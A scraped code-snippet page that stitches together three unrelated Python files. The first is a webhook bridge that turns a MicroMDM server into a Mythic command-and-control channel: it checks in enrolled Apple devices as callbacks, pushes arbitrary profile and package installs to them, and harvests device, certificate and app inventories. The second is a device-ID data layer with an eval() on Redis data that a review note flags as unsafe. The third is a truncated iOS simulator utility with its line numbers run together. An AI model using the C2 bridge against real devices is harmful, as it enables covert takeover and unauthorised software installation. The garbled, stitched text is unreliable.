How to use udid method in ATX

Best Python code snippet using ATX

server

Source:server Github

copy

Full Screen

#!/usr/bin/env python3
"""Webhook bridge between a MicroMDM server and Mythic (the ``mdm`` C2 profile).

MicroMDM is started as a subprocess and configured to POST its command
webhook events to this Sanic app at ``/webhook``.  Each event is decoded and
translated into a Mythic message (checkin / get_tasking / post_response),
and Mythic tasks are translated back into MicroMDM commands.

NOTE(review): the original listing had lost its indentation; the nesting
below was reconstructed from the statement order - confirm against upstream.
"""
from sanic import Sanic
from sanic.response import html, redirect, text, raw
from sanic.exceptions import NotFound
import sys
import asyncio
import ssl
from pathlib import Path
# rookuu's imports
from base64 import b64decode, b64encode
from time import sleep
import requests
import json
import os
import subprocess
import plistlib
import random
import string
import threading

# Per-app settings keyed by the Sanic app name, plus 'mythic_address'.
config = {}
# Known devices keyed by UDID: {'os', 'host', 'tasks', 'payload_uuid', 'callback_uuid'}.
agents = {}
mdm_host = None
# threading.Lock guarding writes to agents.json; created in __main__.
lock = None

AGENTS_FILE = "agents.json"
MICROMDM_URL = "https://localhost"
MICROMDM_AUTH = ('micromdm', 'mythic')
MYTHIC_HEADERS = {"Mythic": "mdm"}
# Mythic replies are base64(<36-character UUID> + <JSON body>).
UUID_LENGTH = 36

# Mythic command name -> MicroMDM request type, for commands with no arguments.
SIMPLE_REQUEST_TYPES = {
    "device_information": "DeviceInformation",
    "certificate_list": "CertificateList",
    "installed_application_list": "InstalledApplicationList",
    "profile_list": "ProfileList",
    "provisioning_profile_list": "ProvisioningProfileList",
    "security_info": "SecurityInfo",
}


async def print_flush(message):
    """Print *message* and flush stdout immediately."""
    print(message)
    sys.stdout.flush()


def _response_headers(request):
    """Return the optional per-app response headers, or an empty dict."""
    return config.get(request.app.name, {}).get('headers', {})


async def no_match(request, exception):
    """Build the generic 404 response used when a webhook event cannot be handled.

    The original script called this name without defining it, so every
    handled error turned into a NameError.
    """
    return html("Error: Requested URL {} not found".format(request.url), status=404, headers=_response_headers(request))


def server_error_handler(request, exception):
    """Sanic error handler: 500 when there is no request object, 404 otherwise."""
    if request is None:
        print("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP")
        sys.stdout.flush()
        return html("Error: Failed to process request", status=500, headers={})
    # 'headers' is never populated by this script, so it must be optional.
    return html("Error: Requested URL {} not found".format(request.url), status=404, headers=_response_headers(request))


def _save_agents():
    """Persist the in-memory agent table to agents.json under the global lock."""
    with lock:
        with open(AGENTS_FILE, "w") as f:
            json.dump(agents, f)


def _decode_event(event):
    """Decode the base64 plist carried in a webhook event's 'raw_payload'."""
    return plistlib.loads(b64decode(event['raw_payload']))


def _send_to_mythic(sender_uuid, message):
    """POST ``base64(sender_uuid + json(message))`` to Mythic and return the decoded JSON reply."""
    body = b64encode((sender_uuid + json.dumps(message)).encode())
    response = requests.post(config['mythic_address'], data=body, headers=MYTHIC_HEADERS, verify=False)
    return json.loads(b64decode(response.text)[UUID_LENGTH:])


def _queue_mdm_command(command):
    """Submit *command* to the local MicroMDM commands API and return the HTTP response."""
    return requests.post(MICROMDM_URL + "/v1/commands", auth=MICROMDM_AUTH, json=command, verify=False)


def _find_payload_uuid(profiles):
    """Return the PayloadDisplayName of the ``com.apple.mdm`` payload, or None.

    When several profiles contain such a payload the last profile wins,
    matching the original loop (its ``break`` only left the inner loop).
    """
    found = None
    for profile in profiles:
        for content in profile['PayloadContent']:
            if content['PayloadType'] == "com.apple.mdm":
                found = content['PayloadDisplayName']
                break
    return found


def _stage_pkg(encoded_pkg):
    """Write a base64 pkg to /pkg, publish it with mdmctl, and return its manifest URL."""
    name = ''.join(random.choice(string.ascii_letters) for _ in range(8))
    pkg_path = "/pkg/{}.pkg".format(name)
    manifest_path = "/pkg/{}.plist".format(name)
    with open(pkg_path, "wb") as f:
        f.write(b64decode(encoded_pkg))
    # mdmctl generates the manifest (.plist) next to the pkg and uploads both.
    subprocess.run([
        "/build/linux/mdmctl",
        "apply", "app",
        "-pkg", pkg_path,
        "-pkg-url", "https://{}/repo/{}.pkg".format(mdm_host, name),
        "-upload"
    ], check=True)
    with open(manifest_path, "r") as f:
        manifest = f.read()
    # str.replace returns a new string; the original discarded the result,
    # so the manifest was written back unchanged.
    manifest = manifest.replace("localhost", mdm_host)
    with open(manifest_path, "w") as f:
        f.write(manifest)
    return "https://{}/repo/{}.plist".format(mdm_host, name)


def _build_mdm_command(task, udid):
    """Translate a Mythic task into a MicroMDM command dict, or None if unsupported."""
    name = task['command']
    if name in SIMPLE_REQUEST_TYPES:
        command = {"udid": udid, "request_type": SIMPLE_REQUEST_TYPES[name]}
        if name == "device_information":
            command["queries"] = []
        return command
    if name == 'install_profile':
        print(task)
        return {
            "udid": udid,
            "request_type": "InstallProfile",
            "payload": json.loads(task['parameters'])['file']
        }
    if name == 'install_pkg':
        return {
            "udid": udid,
            "request_type": "InstallApplication",
            "manifest_url": _stage_pkg(json.loads(task['parameters'])['file'])
        }
    return None


async def _handle_authenticate(payload):
    """Record a device seen via mdm.Authenticate and ask it for its profile list."""
    await print_flush(payload)
    # Issue: a callback has to be tied to a specific Mythic payload, but MDM
    # does not let us control the data the device sends.
    # Fix: embed the payload ID in an installed profile, then immediately
    # query the profile list to read it back.
    udid = payload['UDID']
    if udid not in agents:
        agents[udid] = {}
    agents[udid]['os'] = payload['OSVersion']
    agents[udid]['host'] = payload['DeviceName']
    agents[udid]['tasks'] = {}
    _save_agents()
    await asyncio.sleep(1)
    _queue_mdm_command({"udid": udid, "request_type": "ProfileList"})


async def _first_checkin(udid, payload_uuid):
    """Register the device with Mythic and remember the callback UUID it assigns."""
    agents[udid]['payload_uuid'] = payload_uuid
    checkin_payload = {
        "action": "checkin",
        "ip": "127.0.0.1",
        "os": agents[udid]['os'],
        "user": "mdmclient",
        "host": agents[udid]['host'],
        "pid": 0,
        "uuid": payload_uuid,
    }
    reply = _send_to_mythic(payload_uuid, checkin_payload)
    agents[udid]['callback_uuid'] = reply['id']
    _save_agents()
    await print_flush("Connect back from payload, assigned {}".format(reply['id']))


async def _report_task_output(udid, payload):
    """Send a command result to Mythic as a post_response.

    Returns True when the result was reported, False when the command UUID
    is not linked to any Mythic task.
    """
    command_uuid = payload['CommandUUID']
    tasks = agents[udid]['tasks']
    if command_uuid not in tasks:
        await print_flush("ERROR: This command wasn't linked to a task launched from Mythic. Not reporting output.")
        return False
    post_response_payload = {
        "action": "post_response",
        "responses": [
            {
                "task_id": tasks[command_uuid],
                "user_output": json.dumps(payload, default=str, indent=4, sort_keys=True),
                "completed": True
            }
        ]
    }
    reply = _send_to_mythic(agents[udid]['callback_uuid'], post_response_payload)
    await print_flush(reply)
    del tasks[command_uuid]
    return True


async def _handle_acknowledged(payload):
    """Handle an 'Acknowledged' mdm.Connect event (a command result)."""
    udid = payload['UDID']
    if "ProfileList" in payload and "callback_uuid" not in agents[udid]:
        # First ProfileList from a device without a callback: do the checkin.
        payload_uuid = _find_payload_uuid(payload['ProfileList'])
        if payload_uuid is None:
            await print_flush("ERROR: No com.apple.mdm payload found in ProfileList. Not checking in.")
            return
        await print_flush("Found payload ID: {}".format(payload_uuid))
        await _first_checkin(udid, payload_uuid)
        return
    # Every other result (including a tasked ProfileList) maps back to a Mythic task.
    if await _report_task_output(udid, payload):
        _save_agents()


async def _handle_idle(payload):
    """Handle an 'Idle' mdm.Connect event: fetch Mythic tasking and queue MDM commands."""
    udid = payload['UDID']
    reply = _send_to_mythic(agents[udid]['callback_uuid'], {"action": "get_tasking", "tasking_size": -1})
    await print_flush(reply)
    for task in reply['tasks']:
        command = _build_mdm_command(task, udid)
        if command is None:
            # The original fell through with an unbound or stale command here.
            await print_flush("ERROR: Unsupported command {}. Skipping task {}.".format(task['command'], task.get('id')))
            continue
        r = _queue_mdm_command(command)
        # Create a mapping between MicroMDM command UUIDs and Mythic task UUIDs.
        command_uuid = r.json()['payload']['command_uuid']
        agents[udid]['tasks'][command_uuid] = task['id']
        _save_agents()


async def _handle_force_callback(body):
    """Ask MicroMDM to push the device that owns the given Mythic callback UUID."""
    callback_uuid = body['callback_uuid']
    await print_flush(body)
    udid = None
    for agent_udid, agent in agents.items():
        # Agents that have not checked in yet have no 'callback_uuid' key.
        if agent.get('callback_uuid') == callback_uuid:
            udid = agent_udid
            break
    if not udid:
        raise Exception("Agent not found")
    await print_flush("Forced callback for {} ({})".format(callback_uuid, udid))
    requests.get("{}/push/{}".format(MICROMDM_URL, udid), auth=MICROMDM_AUTH, verify=False)


async def agent_message(request, **kwargs):
    """Sanic route for ``/webhook``: dispatch a MicroMDM / Mythic event by its topic.

    Returns an empty 200 response when the event was processed (or ignored),
    and the generic 404 response when handling raised an exception.
    """
    try:
        if config[request.app.name]['debug']:
            await print_flush("agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers))
            await print_flush(request.json)
        if request.method == "POST":
            body = request.json
            topic = body['topic']
            if topic == 'mdm.Authenticate':
                # First time we've seen an agent.
                await _handle_authenticate(_decode_event(body['checkin_event']))
            elif topic == 'mdm.TokenUpdate':
                # Decoded (so malformed events still fail) but otherwise unused.
                _decode_event(body['checkin_event'])
            elif topic == 'mdm.Connect':
                # Agent is returning data for some command, or is idle.
                payload = _decode_event(body['acknowledge_event'])
                await print_flush(payload)
                if payload['Status'] == 'Acknowledged':
                    await _handle_acknowledged(payload)
                elif payload['Status'] == "Idle":
                    await _handle_idle(payload)
            elif topic == "mythic.force_callback":
                await _handle_force_callback(body)
        return raw('', status=200)
    except Exception as e:
        if config[request.app.name]['debug']:
            await print_flush("error in agent_message: {}".format(str(e)))
        return await no_match(request, NotFound)


if __name__ == "__main__":
    sys.path.append("/Mythic/mythic")
    from mythic_c2_container.C2ProfileBase import *
    from mythic_c2_container.MythicCallbackRPC import *
    with open("config.json", 'rb') as config_file:
        main_config = json.loads(config_file.read().decode('utf-8'))
    print("Opening config and starting mdm...")
    sys.stdout.flush()
    # basic mapping of the general endpoints to the real endpoints
    try:
        config['mythic_address'] = os.environ['MYTHIC_ADDRESS']
    except KeyError:
        print("failed to find MYTHIC_ADDRESS environment variable")
        sys.stdout.flush()
        sys.exit(1)
    config[str(main_config['webhook_port'])] = {'debug': main_config['debug']}
    if main_config['debug']:
        print("Debugging statements are enabled. This gives more context, but might be a performance hit")
    else:
        print("Debugging statements are disabled")
    sys.stdout.flush()
    with open("/certs/mdm.crt", "wb") as f:
        f.write(b64decode(main_config['tls_cert']))
    with open("/certs/mdm.key", "wb") as f:
        f.write(b64decode(main_config['tls_key']))
    mdm_host = main_config['mdm_host']
    # load agents
    lock = threading.Lock()
    if os.path.exists(AGENTS_FILE):
        with open(AGENTS_FILE, "r") as f:
            agents = json.load(f)
    os.system("cp /var/db/micromdm/micromdm.db /Mythic/micromdm.db")
    os.system("ln -sf /Mythic/micromdm.db /var/db/micromdm/micromdm.db")
    # start mdm
    p = subprocess.Popen([
        "/build/linux/micromdm", "serve",
        "-server-url=https://{}".format(main_config['mdm_host']),
        "-api-key", "mythic",
        "-tls-cert", "/certs/mdm.crt",
        "-tls-key", "/certs/mdm.key",
        "-filerepo", "/pkg",
        "-command-webhook-url", "http://localhost:{}/webhook".format(main_config['webhook_port'])
    ])
    # now to create an app to handle webhook
    app = Sanic(str(main_config['webhook_port']))
    app.config['REQUEST_MAX_SIZE'] = 1000000000
    app.config['REQUEST_TIMEOUT'] = 600
    app.config['RESPONSE_TIMEOUT'] = 600
    app.add_route(agent_message, "/webhook", methods=['GET', 'POST'])
    app.error_handler.add(Exception, server_error_handler)
    debug_enabled = bool(main_config['debug'])
    server = app.create_server(host="127.0.0.1", port=main_config['webhook_port'], debug=debug_enabled, return_asyncio_server=True, access_log=debug_enabled)
    task = asyncio.ensure_future(server)
    try:
        loop = asyncio.get_event_loop()

        def callback(fut):
            """Exit the process when the webhook server failed to start."""
            try:
                fut.result()
            except Exception as e:
                print("port already in use")
                print("webhook server failed to start: {}".format(e))
                sys.stdout.flush()
                sys.exit()

        task.add_done_callback(callback)
        loop.run_forever()
    except BaseException:
        # Includes KeyboardInterrupt and the SystemExit raised by callback().
        sys.stdout.flush()
        sys.exit()

Full Screen

Full Screen

user_dal.py

Source:user_dal.py Github

copy

Full Screen

"""Data-access helpers for device identifiers, login state and user selections."""
import redis
import time
import json
from datetime import datetime
from api.user.constants import INVALID_IDFAS
from api.constants import EnumUserGroup
from api.log import exception_logger, api_logger

from api.user.models import UserSelectInfo, UniqueDeviceInfo
from pyutil.api.redis_key import get_songlist_receive_version_for_udid_key, \
    get_songlist_receive_version_key, get_uid_info_key
from pyutil.api.account import Platform
from api.user.types import MAX_DEVICES_ONLINE, LoginStatus, User
from api.channel.constants import VALID_GENDERS, VALID_AGES


def _is_invalid_idfa(idfa):
    """Return True for an empty, blacklisted, or low-entropy (< 5 distinct chars) idfa."""
    return not idfa or idfa in INVALID_IDFAS or len(set(idfa)) < 5


def _load_online_devices(redis_cli, key):
    """Return the JSON list stored in the 'online_devices' hash field, or []."""
    raw_online_devices = redis_cli.hget(key, 'online_devices')
    return json.loads(raw_online_devices) if raw_online_devices else []


# NOTE: the original module defined this class twice with the same body (the
# later copy silently rebinding the name); a single definition is kept.
class UniqueDeviceInfoDAL(object):
    """Lookups and updates for UniqueDeviceInfo records and per-udid timestamps."""

    def __init__(self, redis_pool):
        self.udid_status_redis = redis.StrictRedis(connection_pool=redis_pool)

    @staticmethod
    def get_udid_by_idfa(idfa):
        """Return the udid recorded for *idfa*, or None if invalid or unknown.

        A stored udid is only accepted when it is longer than 10 characters.
        """
        if _is_invalid_idfa(idfa):
            api_logger.error('invalid idfa:{}'.format(idfa))
            return None
        # Only the first record is used, so do not materialise the whole queryset.
        record = UniqueDeviceInfo.objects(idfa=idfa).first()
        if record is not None and len(record.unique_device_id) > 10:
            api_logger.info('get_udid_by_idfa succeed|idfa:{}|udid:{}'.format(idfa, record.unique_device_id))
            return record.unique_device_id
        return None

    @staticmethod
    def set_udid_by_idfa(idfa, udid, e_flag=''):
        """Create or update the (udid, idfa) record, optionally setting e_flag."""
        # Analytics requirement: every invalid idfa is stored as the empty string.
        if _is_invalid_idfa(idfa):
            api_logger.error('invalid idfa:{}|udid:{}'.format(idfa, udid))
            idfa = ''
        device_info = UniqueDeviceInfo.objects(unique_device_id=udid, idfa=idfa).first()
        if device_info is None:
            device_info = UniqueDeviceInfo(idfa=idfa, unique_device_id=udid)
        if e_flag:
            device_info.e_flag = e_flag
        device_info.save()
        api_logger.info('idfa:{}|udid:{}'.format(idfa, udid))

    @staticmethod
    def set_udid_by_atd(atd, udid, e_flag=''):
        """Create or update the (udid, atd) record.

        e_flag is only written when no record for this udid carries one yet.
        """
        # Analytics requirement: every invalid atd is stored as the empty string.
        if not atd or len(set(atd)) < 5:
            api_logger.error('invalid atd:{}|udid:{}'.format(atd, udid))
            atd = ''
        device_info = UniqueDeviceInfo.objects(unique_device_id=udid, atd=atd).first()
        if device_info is None:
            device_info = UniqueDeviceInfo(unique_device_id=udid, atd=atd)
        if e_flag and UniqueDeviceInfo.objects(unique_device_id=udid, e_flag__exists=1).first() is None:
            device_info.e_flag = e_flag
        device_info.save()
        api_logger.info('atd:{}|udid:{}'.format(atd, udid))

    @staticmethod
    def set_udid_by_afid(af_id, udid):
        """Attach *af_id* to the record for *udid*, creating the record if needed."""
        if not af_id:
            api_logger.error('invalid af_id:{}'.format(af_id))
            return
        device_info = UniqueDeviceInfo.objects(unique_device_id=udid).first()
        if device_info is None:
            device_info = UniqueDeviceInfo()
            device_info.unique_device_id = udid
        device_info.af_id = af_id
        device_info.save()
        api_logger.info('af_id:{}|udid:{}'.format(af_id, udid))

    def get_udid_status(self, udid, atd):
        """Return EnumUserGroup.NEW if the udid was first seen today, else ALL.

        A udid with no stored timestamp is treated as first seen now.  Any
        error is logged and the current status is returned.
        """
        udid_status = EnumUserGroup.ALL
        try:
            udid_ctime = int(self.udid_status_redis.get(udid) or time.time())
            today = datetime.now().timetuple()
            created = time.localtime(udid_ctime)
            if today.tm_year == created.tm_year and today.tm_yday == created.tm_yday:
                udid_status = EnumUserGroup.NEW
                # For new users, also store the atd when one was supplied.
                if atd:
                    UniqueDeviceInfoDAL.set_udid_by_atd(atd, udid)
        except Exception as e:
            exception_logger.exception('udid:{} except:{}'.format(udid, e))

        return udid_status

    def set_udid_ts(self, udid):
        """Store the current time for *udid* unless a value already exists (SETNX)."""
        try:
            self.udid_status_redis.setnx(udid, int(time.time()))
        except Exception as e:
            exception_logger.exception('udid:{}, e:{}'.format(udid, e))

    def get_udid_ts(self, udid):
        """Return True when a (truthy) value is stored for *udid*."""
        return bool(self.udid_status_redis.get(udid))


class UserDAL():
    """Redis-backed login state and song-list version lookups."""

    def clear_device(self, uid, udid, uid_info_redis_cli):
        """Remove *udid* from the uid's online devices; delete the key when none remain."""
        key = get_uid_info_key(uid)
        remaining = [
            _udid for _udid in _load_online_devices(uid_info_redis_cli, key)
            if _udid != udid
        ]
        if remaining:
            uid_info_redis_cli.hset(key, 'online_devices', json.dumps(remaining))
        else:
            uid_info_redis_cli.delete(key)

    def get_login_status(
        self, token_expire_at, uid, udid, platform, redis_cli
    ):
        """Return the LoginStatus for this token / device combination."""
        if token_expire_at < int(time.time()):
            if platform == Platform.FACEBOOK:
                return LoginStatus.FACEBOOK_TOKEN_EXPIRE
            if platform == Platform.TWITTER:
                return LoginStatus.TWITTER_TOKEN_EXPIRE
            return LoginStatus.UNKNOWN_EXPIRE
        online_devices = _load_online_devices(redis_cli, get_uid_info_key(uid))
        if udid in online_devices:
            return LoginStatus.OK
        return LoginStatus.FORCE_LOGOUT

    def save_uid_online_devices(self, uid, udid, redis_cli):
        """Add *udid* to the uid's online devices, keeping the last MAX_DEVICES_ONLINE."""
        key = get_uid_info_key(uid)
        online_devices = _load_online_devices(redis_cli, key)
        if udid not in online_devices:
            online_devices.append(udid)
        online_devices = online_devices[-MAX_DEVICES_ONLINE:]
        redis_cli.hset(key, 'online_devices', json.dumps(online_devices))

    def get_songlist_cvs(self, uid, udid, redis_cli):
        """Return the stored song-list version for *udid* as an int, or -1 if absent."""
        if uid:
            owner_id, owner_type = uid, User.TYPE_UID
        else:
            owner_id, owner_type = udid, User.TYPE_UNIQUE_DEVICE_ID
        cvs_key = get_songlist_receive_version_key(owner_id, owner_type)
        version_info = redis_cli.get(cvs_key)
        version_key = get_songlist_receive_version_for_udid_key(udid)
        # SECURITY NOTE(review): eval() executes whatever is stored in Redis.
        # If the writer stores a plain dict literal, ast.literal_eval (or JSON)
        # would be a safe replacement - confirm the stored format first.
        version_info = {} if not version_info else eval(version_info)
        return int(version_info.get(version_key, -1))


class UserSelectInfoDAL(object):
    """Reads and writes the gender / age-stage selection of a user or device."""

    def __init__(self):
        pass

    @staticmethod
    def get(udid, uid):
        """Return {'gender', 'age_stage'} for the uid (or udid when uid is falsy), else {}.

        A missing record yields {} silently; any other failure is logged and
        also yields {}, so callers never see an exception.
        """
        pk, utype = (uid, 1) if uid else (udid, 0)
        try:
            user_select_info = UserSelectInfo.objects(user_id=pk, user_type=utype).first()
        except Exception as e:
            exception_logger.exception('user_id:{}|user_type:{}|e:{}'.format(pk, utype, e))
            return {}
        if user_select_info is None:
            return {}
        return dict(gender=user_select_info.gender, age_stage=user_select_info.age_stage)

    @staticmethod
    def set(udid, gender, age_stage, uid):
        """Upsert the selection and return the stored {'gender', 'age_stage'}.

        Raises:
            Exception: when neither gender nor age_stage is a valid value.
        """
        pk, utype = (uid, 1) if uid else (udid, 0)
        # At least one of gender / age must carry valid information.
        if gender not in VALID_GENDERS and age_stage not in VALID_AGES:
            raise Exception('udid={}|invalid gender={}|age={}'.format(udid, gender, age_stage))

        # -1 means "not provided": gender == -1 writes only age_stage,
        # age_stage == -1 writes only gender, otherwise both are written.
        updates = {'mtime': datetime.now()}
        if gender != -1:
            updates['gender'] = gender
        if gender == -1 or age_stage != -1:
            updates['age_stage'] = age_stage
        rv = UserSelectInfo.objects(user_id=pk, user_type=utype).modify(upsert=True, new=True, **updates)
        return {'gender': rv.gender, 'age_stage': rv.age_stage}

Full Screen

Full Screen

iossim_util.py

Source:iossim_util.py Github

copy

Full Screen

...56 if runtime['version'] == version and 'iOS' in runtime['name']:57 return runtime['identifier']58 raise test_runner.SimulatorNotFoundError('Not found "%s" SDK in runtimes %s' %59 (version, simulators['runtimes']))60def get_simulator_runtime_by_device_udid(simulator_udid):61 """Gets simulator runtime based on simulator UDID.62 Args:63 simulator_udid: (str) UDID of a simulator.64 """65 simulator_list = get_simulator_list()['devices']66 for runtime, simulators in simulator_list.items():67 for device in simulators:68 if simulator_udid == device['udid']:69 return runtime70 raise test_runner.SimulatorNotFoundError(71 'Not found simulator with "%s" UDID in devices %s' % (simulator_udid,72 simulator_list))73def get_simulator_udids_by_platform_and_version(platform, version):74 """Gets list of simulators UDID based on platform name and iOS version.75 Args:76 platform: (str) A platform name, e.g. "iPhone 11"77 version: (str) A version name, e.g. "13.2.2"78 """79 simulators = get_simulator_list()80 devices = simulators['devices']81 sdk_id = get_simulator_runtime_by_version(simulators, version)82 results = []83 for device in devices.get(sdk_id, []):84 if device['name'] == _compose_simulator_name(platform, version):85 results.append(device['udid'])86 return results87def create_device_by_platform_and_version(platform, version):88 """Creates a simulator and returns UDID of it.89 Args:90 platform: (str) A platform name, e.g. "iPhone 11"91 version: (str) A version name, e.g. 
"13.2.2"92 """93 name = _compose_simulator_name(platform, version)94 LOGGER.info('Creating simulator %s', name)95 simulators = get_simulator_list()96 device_type = get_simulator_device_type_by_platform(simulators, platform)97 runtime = get_simulator_runtime_by_version(simulators, version)98 try:99 udid = subprocess.check_output(100 ['xcrun', 'simctl', 'create', name, device_type, runtime]).rstrip()101 LOGGER.info('Created simulator in first attempt with UDID: %s', udid)102 # Sometimes above command fails to create a simulator. Verify it and retry103 # once if first attempt failed.104 if not is_device_with_udid_simulator(udid):105 # Try to delete once to avoid duplicate in case of race condition.106 delete_simulator_by_udid(udid)107 udid = subprocess.check_output(108 ['xcrun', 'simctl', 'create', name, device_type, runtime]).rstrip()109 LOGGER.info('Created simulator in second attempt with UDID: %s', udid)110 return udid111 except subprocess.CalledProcessError as e:112 LOGGER.error('Error when creating simulator "%s": %s' % (name, e.output))113 raise e114def delete_simulator_by_udid(udid):115 """Deletes simulator by its udid.116 Args:117 udid: (str) UDID of simulator.118 """119 LOGGER.info('Deleting simulator %s', udid)120 try:121 subprocess.check_output(['xcrun', 'simctl', 'delete', udid],122 stderr=subprocess.STDOUT)123 except subprocess.CalledProcessError as e:124 # Logging error instead of throwing so we don't cause failures in case125 # this was indeed failing to clean up.126 message = 'Failed to delete simulator %s with error %s' % (udid, e.output)127 LOGGER.error(message)128def wipe_simulator_by_udid(udid):129 """Wipes simulators by its udid.130 Args:131 udid: (str) UDID of simulator.132 """133 for _, devices in get_simulator_list()['devices'].items():134 for device in devices:135 if device['udid'] != udid:136 continue137 try:138 LOGGER.info('Shutdown simulator %s ', device)139 if device['state'] != 'Shutdown':140 subprocess.check_call(['xcrun', 'simctl', 
'shutdown', device['udid']])141 except subprocess.CalledProcessError as ex:142 LOGGER.error('Shutdown failed %s ', ex)...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub, from setting up the prerequisites and running your first automation test to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile step-by-step guides to help you become proficient with different test automation frameworks, e.g., Selenium, Cypress, and TestNG.

LambdaTest Learning Hubs:

YouTube

You can also refer to the video tutorials on the LambdaTest YouTube channel for step-by-step demonstrations from industry experts.

Run ATX automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

Not Helpful